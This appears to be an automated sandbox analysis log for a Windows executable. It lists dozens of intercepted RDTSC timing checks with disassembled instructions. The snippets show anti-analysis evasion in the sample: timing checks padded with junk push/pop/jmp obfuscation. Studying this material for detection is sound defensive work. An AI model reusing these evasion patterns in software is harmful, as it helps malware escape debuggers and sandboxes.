Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3AF536 second address: 3AF53A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3AF7B0 second address: 3AF7B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3AF7B8 second address: 3AF7BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3AF7BD second address: 3AF7C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnc 00007F8EA4E2EA46h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3AF7C9 second address: 3AF7DC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jg 00007F8EA52B3CAEh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3AF7DC second address: 3AF7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8EA4E2EA4Eh 0x0000000a jbe 00007F8EA4E2EA4Ch 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3AF7FD second address: 3AF803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3AFB28 second address: 3AFB2E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3B4819 second address: 3B4825 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8EA52B3CA6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3B4825 second address: 3B4852 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F8EA4E2EA46h 0x00000009 jmp 00007F8EA4E2EA4Dh 0x0000000e pop edi 0x0000000f jp 00007F8EA4E2EA4Eh 0x00000015 pushad 0x00000016 popad 0x00000017 jl 00007F8EA4E2EA46h 0x0000001d pop edx 0x0000001e pop eax 0x0000001f push ebx 0x00000020 push edi 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3B7933 second address: 3B793C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3B7AB1 second address: 3B7AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3B7AB5 second address: 3B7AC1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3B7AC1 second address: 3B7ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8EA4E2EA46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3B7ACB second address: 3B7ACF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3B7F6D second address: 3B7F7F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8EA4E2EA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F8EA4E2EA46h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3B7F7F second address: 3B7F83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3B7F83 second address: 3B7F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3B7F89 second address: 3B7F95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jns 00007F8EA52B3CA6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3BF2B5 second address: 3BF2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8EA4E2EA4Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3BF2CD second address: 3BF2D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3BF437 second address: 3BF47E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F8EA4E2EA4Eh 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 jmp 00007F8EA4E2EA57h 0x00000016 pushad 0x00000017 jmp 00007F8EA4E2EA53h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3BF87C second address: 3BF882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3BF9B3 second address: 3BF9BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3BF9BA second address: 3BF9F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 jbe 00007F8EA52B3CC1h 0x00000018 jmp 00007F8EA52B3CB9h 0x0000001d push edx 0x0000001e pop edx 0x0000001f pushad 0x00000020 push edi 0x00000021 pop edi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3BFB61 second address: 3BFB78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3BFD19 second address: 3BFD1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3C018E second address: 3C0194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3C0194 second address: 3C01A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8EA52B3CABh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3C01A7 second address: 3C01AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3C0952 second address: 3C0985 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F8EA52B3CA6h 0x00000011 jmp 00007F8EA52B3CB2h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3C0985 second address: 3C098B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3C098B second address: 3C0998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3C10E0 second address: 3C10E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3C10E7 second address: 3C10EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3C721A second address: 3C7225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8EA4E2EA46h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3C734A second address: 3C734E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3C734E second address: 3C7352 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3C7352 second address: 3C7377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F8EA52B3CABh 0x0000000c pop edx 0x0000000d pop esi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8EA52B3CAEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3C7377 second address: 3C737D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3C737D second address: 3C7387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3C7387 second address: 3C738B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3D2B9F second address: 3D2BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3D2BA5 second address: 3D2BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3D2BAC second address: 3D2BB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3D2BB1 second address: 3D2BCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F8EA4E2EA53h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3F3C08 second address: 3F3C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8EA52B3CA6h 0x0000000a popad 0x0000000b jmp 00007F8EA52B3CB9h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3F3C32 second address: 3F3C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8EA4E2EA4Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3F3C41 second address: 3F3C72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB7h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8EA52B3CB6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3F2724 second address: 3F2735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8EA4E2EA4Ch 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3F2735 second address: 3F273A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3F273A second address: 3F2760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F8EA4E2EA52h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F8EA4E2EA52h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3F2A09 second address: 3F2A0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3F2C6B second address: 3F2C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3F2C78 second address: 3F2C8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3F74FE second address: 3F751C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8EA4E2EA57h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3F751C second address: 3F7524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3F7074 second address: 3F707A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3F707A second address: 3F7088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F8EA52B3CA6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3F7088 second address: 3F708E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3F708E second address: 3F7098 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8EA52B3CBEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3F7098 second address: 3F70B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8EA4E2EA52h 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3F70B5 second address: 3F70BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 40194E second address: 401953 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 406BAA second address: 406BAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4152D4 second address: 4152F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8EA4E2EA58h 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4152F6 second address: 4152FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 430390 second address: 4303CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F8EA4E2EA51h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F8EA4E2EA53h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4303CF second address: 4303EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8EA52B3CB0h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4303EB second address: 4303F5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8EA4E2EA46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4303F5 second address: 4303FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 430704 second address: 430709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 430855 second address: 430859 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 430B27 second address: 430B3D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8EA4E2EA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jo 00007F8EA4E2EA46h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 430E06 second address: 430E29 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8EA52B3CBEh 0x00000008 jnp 00007F8EA52B3CA6h 0x0000000e jmp 00007F8EA52B3CB2h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 430F6F second address: 430F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 430F75 second address: 430F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4310D1 second address: 4310D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 435578 second address: 43557C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4357C4 second address: 4357CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4357CB second address: 4357F6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8EA52B3CB7h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F8EA52B3CA6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4357F6 second address: 435800 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8EA4E2EA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 435800 second address: 435850 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jp 00007F8EA52B3CB0h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F8EA52B3CB7h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 435B05 second address: 435B0F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8EA4E2EA4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 435B0F second address: 435B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 xor dword ptr [ebp+122D19D3h], ecx 0x0000000d push dword ptr [ebp+122D2CACh] 0x00000013 push esi 0x00000014 sub dword ptr [ebp+122D1B1Eh], ecx 0x0000001a pop edx 0x0000001b call 00007F8EA52B3CA9h 0x00000020 pushad 0x00000021 pushad 0x00000022 jg 00007F8EA52B3CA6h 0x00000028 jmp 00007F8EA52B3CB1h 0x0000002d popad 0x0000002e push edx 0x0000002f jmp 00007F8EA52B3CB3h 0x00000034 pop edx 0x00000035 popad 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F8EA52B3CB2h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 435B78 second address: 435BBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edi 0x0000000f jbe 00007F8EA4E2EA46h 0x00000015 pop edi 0x00000016 pop eax 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F8EA4E2EA55h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 435BBD second address: 435BE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 je 00007F8EA52B3CA6h 0x0000000f popad 0x00000010 popad 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 push edx 0x00000017 jmp 00007F8EA52B3CAFh 0x0000001c pop edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 437412 second address: 43741E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F8EA4E2EA46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 43741E second address: 437422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 437422 second address: 437426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
